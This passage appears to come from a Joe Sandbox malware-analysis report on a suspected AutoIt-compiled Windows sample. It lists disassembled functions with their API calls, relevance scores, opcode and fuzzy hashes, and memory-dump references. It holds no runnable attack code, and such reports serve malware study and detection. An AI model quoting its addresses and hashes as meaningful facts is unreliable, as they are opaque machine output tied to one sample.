                                                            • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                            • String ID:
                                                            • API String ID: 2438371351-0
                                                            • Opcode ID: fc8f1a43d92b409a9fc3443f05f08a35b7dbde12cca23af92c4c83ca62f6b31d
                                                            • Instruction ID: 10ca7e56f18a9261f102899ddabaff2c851a53057e21a6400275d8ee5fbece55
                                                            • Opcode Fuzzy Hash: fc8f1a43d92b409a9fc3443f05f08a35b7dbde12cca23af92c4c83ca62f6b31d
                                                            • Instruction Fuzzy Hash: 20623B30A14218DBEB24DFA4C840BEEB376EF58704F1091A9D20DEB391E7759E81CB59
                                                            Function 00D3955B Relevance: 6.2, APIs: 4, Instructions: 155COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00CD4EE5: _fseek.LIBCMT ref: 00CD4EFD
                                                              • Part of subcall function 00D39734: _wcscmp.LIBCMT ref: 00D39824
                                                              • Part of subcall function 00D39734: _wcscmp.LIBCMT ref: 00D39837
                                                            • _free.LIBCMT ref: 00D396A2
                                                            • _free.LIBCMT ref: 00D396A9
                                                            • _free.LIBCMT ref: 00D39714
                                                              • Part of subcall function 00CF2D55: RtlFreeHeap.NTDLL(00000000,00000000,?,00CF9A24), ref: 00CF2D69
                                                              • Part of subcall function 00CF2D55: GetLastError.KERNEL32(00000000,?,00CF9A24), ref: 00CF2D7B
                                                            • _free.LIBCMT ref: 00D3971C
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                                                            • String ID:
                                                            • API String ID: 1552873950-0
                                                            • Opcode ID: 83a1bf45cb5b46f0fbbb2b282febcfcf75e63ad05b5baa694a85d9b23f0f737c
                                                            • Instruction ID: 27f95c5cedfbf805ba5563cc34d73a0373348ea4c1bcd0a5e2648dcaf2f12d44
                                                            • Opcode Fuzzy Hash: 83a1bf45cb5b46f0fbbb2b282febcfcf75e63ad05b5baa694a85d9b23f0f737c
                                                            • Instruction Fuzzy Hash: 5E514FB1D04258AFDF249FA4CC85AAEBB79EF48300F10449EF649A3351DB715A80DF69
                                                            Function 00CF470A Relevance: 6.1, APIs: 4, Instructions: 136COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                                                            • String ID:
                                                            • API String ID: 2782032738-0
                                                            • Opcode ID: 998aeda2236a74d80706e5f9a46343bd1135ee917ddd04e378ba6ed458c3dace
                                                            • Instruction ID: 8ad246a2a4455f5cb4c4a278790309ba33e78bb2694b2cfc09ee81d2f7a48ebf
                                                            • Opcode Fuzzy Hash: 998aeda2236a74d80706e5f9a46343bd1135ee917ddd04e378ba6ed458c3dace
                                                            • Instruction Fuzzy Hash: 8741D974A0074D9BDB5CDE69C8809BF7BA6EF41364B24813EE625C7680D770DE41CB42
                                                            Function 00CD7285 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • _memset.LIBCMT ref: 00D0EA39
                                                            • GetOpenFileNameW.COMDLG32(?), ref: 00D0EA83
                                                              • Part of subcall function 00CD4750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00CD4743,?,?,00CD37AE,?), ref: 00CD4770
                                                              • Part of subcall function 00CF0791: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00CF07B0
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: Name$Path$FileFullLongOpen_memset
                                                            • String ID: X
                                                            • API String ID: 3777226403-3081909835
                                                            • Opcode ID: befce7fdccd679310b7f9548c14fc5099b5f03fee8b41e5c62a2277374f7aa98
                                                            • Instruction ID: 392f541795fe1a97be1985e03988566ef80ef73c25c1f09cddfc0f15df4b0bb7
                                                            • Opcode Fuzzy Hash: befce7fdccd679310b7f9548c14fc5099b5f03fee8b41e5c62a2277374f7aa98
                                                            • Instruction Fuzzy Hash: DD21D230A002889BCF51DF98DC45BEE7BF8AF48710F04405AE608EB381DBB45989DFA1
                                                            Function 00D398E3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetTempPathW.KERNEL32(00000104,?), ref: 00D398F8
                                                            • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 00D3990F
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: Temp$FileNamePath
                                                            • String ID: aut
                                                            • API String ID: 3285503233-3010740371
                                                            • Opcode ID: 5f51ce2e9bf74347fc239184bb4c023b228cd2e5630575022c59899ee649e6d0
                                                            • Instruction ID: 9e491493783c5caa6f36f1cbc5346460da843c52eac1a07c4fd1d594b1cd182e
                                                            • Opcode Fuzzy Hash: 5f51ce2e9bf74347fc239184bb4c023b228cd2e5630575022c59899ee649e6d0
                                                            • Instruction Fuzzy Hash: 78D05BB554030D6BDB50AB90DC0DF96773CD704705F4002B1BE54D5191D97055589BA5
                                                            Function 00D4CADD Relevance: 4.9, APIs: 3, Instructions: 392COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 2255a64eb274ebb280606efbd923bbb64024f7590e4161a9c6d2bea4ebf0eb30
                                                            • Instruction ID: 3845ad83409b1f9d3e5937bbfc18d530874aad89e621248e19c1dbe41ed340ce
                                                            • Opcode Fuzzy Hash: 2255a64eb274ebb280606efbd923bbb64024f7590e4161a9c6d2bea4ebf0eb30
                                                            • Instruction Fuzzy Hash: E4F14875A083419FCB54DF28C480A6ABBE5FF88314F14892EF9999B351D730E945CFA2
                                                            Function 00CDF76F Relevance: 4.7, APIs: 3, Instructions: 168comCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00CF0162: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00CF0193
                                                              • Part of subcall function 00CF0162: MapVirtualKeyW.USER32(00000010,00000000), ref: 00CF019B
                                                              • Part of subcall function 00CF0162: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00CF01A6
                                                              • Part of subcall function 00CF0162: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00CF01B1
                                                              • Part of subcall function 00CF0162: MapVirtualKeyW.USER32(00000011,00000000), ref: 00CF01B9
                                                              • Part of subcall function 00CF0162: MapVirtualKeyW.USER32(00000012,00000000), ref: 00CF01C1
                                                              • Part of subcall function 00CE60F9: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,00CDF930), ref: 00CE6154
                                                            • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 00CDF9CD
                                                            • OleInitialize.OLE32(00000000), ref: 00CDFA4A
                                                            • CloseHandle.KERNEL32(00000000), ref: 00D145C8
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                                            • String ID:
                                                            • API String ID: 1986988660-0
                                                            • Opcode ID: cc2620dba1fc6e8d72ad806ebfb6f78751c802bf0aa8492918bc3e060540ed47
                                                            • Instruction ID: f4ba1996f70491144c5973ed8e6b8772dcd2e8975bb2f8c9097788cff547257f
                                                            • Opcode Fuzzy Hash: cc2620dba1fc6e8d72ad806ebfb6f78751c802bf0aa8492918bc3e060540ed47
                                                            • Instruction Fuzzy Hash: 0D81C9B0901B40CFC7C6EF7AB8406197BE5EB89306750823BE509CB36AEB7045858F71
                                                            Function 00CD434A Relevance: 4.6, APIs: 3, Instructions: 77windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • _memset.LIBCMT ref: 00CD4370
                                                            • Shell_NotifyIconW.SHELL32(00000000,?), ref: 00CD4415
                                                            • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00CD4432
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: IconNotifyShell_$_memset
                                                            • String ID:
                                                            • API String ID: 1505330794-0
                                                            • Opcode ID: ff63b8a01fca525031b0ad734f7ccd403b52399d0ceec003bf68055803800f9d
                                                            • Instruction ID: 10a2dad46f1791ef4b7268c8dd8f3584f59f0377f275aa01c126eaeefb31e8e6
                                                            • Opcode Fuzzy Hash: ff63b8a01fca525031b0ad734f7ccd403b52399d0ceec003bf68055803800f9d
                                                            • Instruction Fuzzy Hash: 89315EB05047019FD725EF24D88569BBBE8FB58309F00092FE79AC6351E771AA44CBA6
                                                            Function 00CF571C Relevance: 4.6, APIs: 3, Instructions: 59memoryCOMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • __FF_MSGBANNER.LIBCMT ref: 00CF5733
                                                              • Part of subcall function 00CFA16B: __NMSG_WRITE.LIBCMT ref: 00CFA192
                                                              • Part of subcall function 00CFA16B: __NMSG_WRITE.LIBCMT ref: 00CFA19C
                                                            • __NMSG_WRITE.LIBCMT ref: 00CF573A
                                                              • Part of subcall function 00CFA1C8: GetModuleFileNameW.KERNEL32(00000000,00D933BA,00000104,?,00000001,00000000), ref: 00CFA25A
                                                              • Part of subcall function 00CFA1C8: ___crtMessageBoxW.LIBCMT ref: 00CFA308
                                                              • Part of subcall function 00CF309F: ___crtCorExitProcess.LIBCMT ref: 00CF30A5
                                                              • Part of subcall function 00CF309F: ExitProcess.KERNEL32 ref: 00CF30AE
                                                              • Part of subcall function 00CF8B28: __getptd_noexit.LIBCMT ref: 00CF8B28
                                                            • RtlAllocateHeap.NTDLL(013F0000,00000000,00000001,00000000,?,?,?,00CF0DD3,?), ref: 00CF575F
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                                                            • String ID:
                                                            • API String ID: 1372826849-0
                                                            • Opcode ID: 5f64412bfac4ff3371d9c5f8337de60856a5a1ee0e45d5b92fe2face979b0426
                                                            • Instruction ID: 3417162f2565d496c1c8b7ad11d2b846da55a6e8bee6fbf02d6c06bf32b1ac31
                                                            • Opcode Fuzzy Hash: 5f64412bfac4ff3371d9c5f8337de60856a5a1ee0e45d5b92fe2face979b0426
                                                            • Instruction Fuzzy Hash: 9601D275310B09EBD6953735EC42B3E63488B42362F110127F715DA291DE7099015663
                                                            Function 00D398A2 Relevance: 4.5, APIs: 3, Instructions: 24filetimeCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,00D39548,?,?,?,?,?,00000004), ref: 00D398BB
                                                            • SetFileTime.KERNELBASE(00000000,?,00000000,?,?,00D39548,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 00D398D1
                                                            • CloseHandle.KERNEL32(00000000,?,00D39548,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00D398D8
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: File$CloseCreateHandleTime
                                                            • String ID:
                                                            • API String ID: 3397143404-0
                                                            • Opcode ID: 250e0e367161d36e9712866f0da58852d81e3c0c5408708ca9353d94215787c1
                                                            • Instruction ID: 075b23a9e307d28dac8cc67cc140670a87f24131e7986ee9bb9d636a2a104086
                                                            • Opcode Fuzzy Hash: 250e0e367161d36e9712866f0da58852d81e3c0c5408708ca9353d94215787c1
                                                            • Instruction Fuzzy Hash: A3E08632141714B7E7212B54EC09FCA7B19AB06761F144220FF14ED1E087B1251197A8
                                                            Function 00D38D0D Relevance: 4.5, APIs: 3, Instructions: 22COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • _free.LIBCMT ref: 00D38D1B
                                                              • Part of subcall function 00CF2D55: RtlFreeHeap.NTDLL(00000000,00000000,?,00CF9A24), ref: 00CF2D69
                                                              • Part of subcall function 00CF2D55: GetLastError.KERNEL32(00000000,?,00CF9A24), ref: 00CF2D7B
                                                            • _free.LIBCMT ref: 00D38D2C
                                                            • _free.LIBCMT ref: 00D38D3E
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: _free$ErrorFreeHeapLast
                                                            • String ID:
                                                            • API String ID: 776569668-0
                                                            • Opcode ID: 625e2a9df38ff8793e00647abbe9ccf0d6414545c555b0c4696158d27d9f7751
                                                            • Instruction ID: f093cedb812a977fc282614ff4e215f94a94c782c12beb440da3b94ab76ce080
                                                            • Opcode Fuzzy Hash: 625e2a9df38ff8793e00647abbe9ccf0d6414545c555b0c4696158d27d9f7751
                                                            • Instruction Fuzzy Hash: 13E012A16017094ACB64A578B941AA353DC4F58352B18091DB50DD7186CE64F842E134
                                                            Function 00CDA9C3 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 534COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: CALL
                                                            • API String ID: 0-4196123274
                                                            • Opcode ID: 56a08627b42d5a1f1b05ba088c68933acece4afe347a5a005448b347e87b53cf
                                                            • Instruction ID: 66a5e2f0dd91a597977a93b9692e19e2d6bbb4254c6bc3f85edd370f1ebd87d8
                                                            • Opcode Fuzzy Hash: 56a08627b42d5a1f1b05ba088c68933acece4afe347a5a005448b347e87b53cf
                                                            • Instruction Fuzzy Hash: 95224874508301DFCB24DF14C490A6ABBE1FF84314F15895EEA9A8B362D731ED85DB92
                                                            Function 00CD4C70 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 141COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: _memmove
                                                            • String ID: EA06
                                                            • API String ID: 4104443479-3962188686
                                                            • Opcode ID: 93db2e842341645bddc1ee431b35a7b67b74c055388fb809a927b846b04f7ef4
                                                            • Instruction ID: 6978b4660da8b96895a7b0ed4f28826d964330f7dfb9b20f8239ea88f8e3ec89
                                                            • Opcode Fuzzy Hash: 93db2e842341645bddc1ee431b35a7b67b74c055388fb809a927b846b04f7ef4
                                                            • Instruction Fuzzy Hash: B4415B21A041586BDF299B54C8927BFBFA39B45300F284477EB869B382D6309E4493A1
                                                            Function 00CD7A51 Relevance: 3.1, APIs: 2, Instructions: 97COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: _memmove
                                                            • String ID:
                                                            • API String ID: 4104443479-0
                                                            • Opcode ID: 75b3ef76dc9c1d7680ff1126038a0b5bca49f3ec50bdc15de679bd26e1e87542
                                                            • Instruction ID: 59dfce235b24f8bc9323aa1e81bc4ffb35610179a2d702a7994859434275dd36
                                                            • Opcode Fuzzy Hash: 75b3ef76dc9c1d7680ff1126038a0b5bca49f3ec50bdc15de679bd26e1e87542
                                                            • Instruction Fuzzy Hash: 053188B5604506AFC704DF69C8D1D69F3A5FF48710715872AE629CB391FB30E950DB90
                                                            Function 00CD47D0 Relevance: 3.1, APIs: 2, Instructions: 59COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • IsThemeActive.UXTHEME ref: 00CD4834
                                                              • Part of subcall function 00CF336C: __lock.LIBCMT ref: 00CF3372
                                                              • Part of subcall function 00CF336C: DecodePointer.KERNEL32(00000001,?,00CD4849,00D27C74), ref: 00CF337E
                                                              • Part of subcall function 00CF336C: EncodePointer.KERNEL32(?,?,00CD4849,00D27C74), ref: 00CF3389
                                                              • Part of subcall function 00CD48FD: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00CD4915
                                                              • Part of subcall function 00CD48FD: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00CD492A
                                                              • Part of subcall function 00CD3B3A: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00CD3B68
                                                              • Part of subcall function 00CD3B3A: IsDebuggerPresent.KERNEL32 ref: 00CD3B7A
                                                              • Part of subcall function 00CD3B3A: GetFullPathNameW.KERNEL32(00007FFF,?,?,00D952F8,00D952E0,?,?), ref: 00CD3BEB
                                                              • Part of subcall function 00CD3B3A: SetCurrentDirectoryW.KERNEL32(?), ref: 00CD3C6F
                                                            • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00CD4874
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: InfoParametersSystem$CurrentDirectoryPointer$ActiveDebuggerDecodeEncodeFullNamePathPresentTheme__lock
                                                            • String ID:
                                                            • API String ID: 1438897964-0
                                                            • Opcode ID: 4cbc7b7eb5d643edadee897ff0aafb3b289900290ef8437d423e4bd4329b29aa
                                                            • Instruction ID: ada0818317ce15ca0cdc297f52dcd85e8859285f78625c2ce952293a328ab895
                                                            • Opcode Fuzzy Hash: 4cbc7b7eb5d643edadee897ff0aafb3b289900290ef8437d423e4bd4329b29aa
                                                            • Instruction Fuzzy Hash: 09118C719083459FC700EF69EC0590ABBE8EB89750F10452BF540D73B1DB709649DBA6
                                                            Function 00CF0DB6 Relevance: 3.0, APIs: 2, Instructions: 44COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00CF571C: __FF_MSGBANNER.LIBCMT ref: 00CF5733
                                                              • Part of subcall function 00CF571C: __NMSG_WRITE.LIBCMT ref: 00CF573A
                                                              • Part of subcall function 00CF571C: RtlAllocateHeap.NTDLL(013F0000,00000000,00000001,00000000,?,?,?,00CF0DD3,?), ref: 00CF575F
                                                            • std::exception::exception.LIBCMT ref: 00CF0DEC
                                                            • __CxxThrowException@8.LIBCMT ref: 00CF0E01
                                                              • Part of subcall function 00CF859B: RaiseException.KERNEL32(?,?,?,00D89E78,00000000,?,?,?,?,00CF0E06,?,00D89E78,?,00000001), ref: 00CF85F0
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
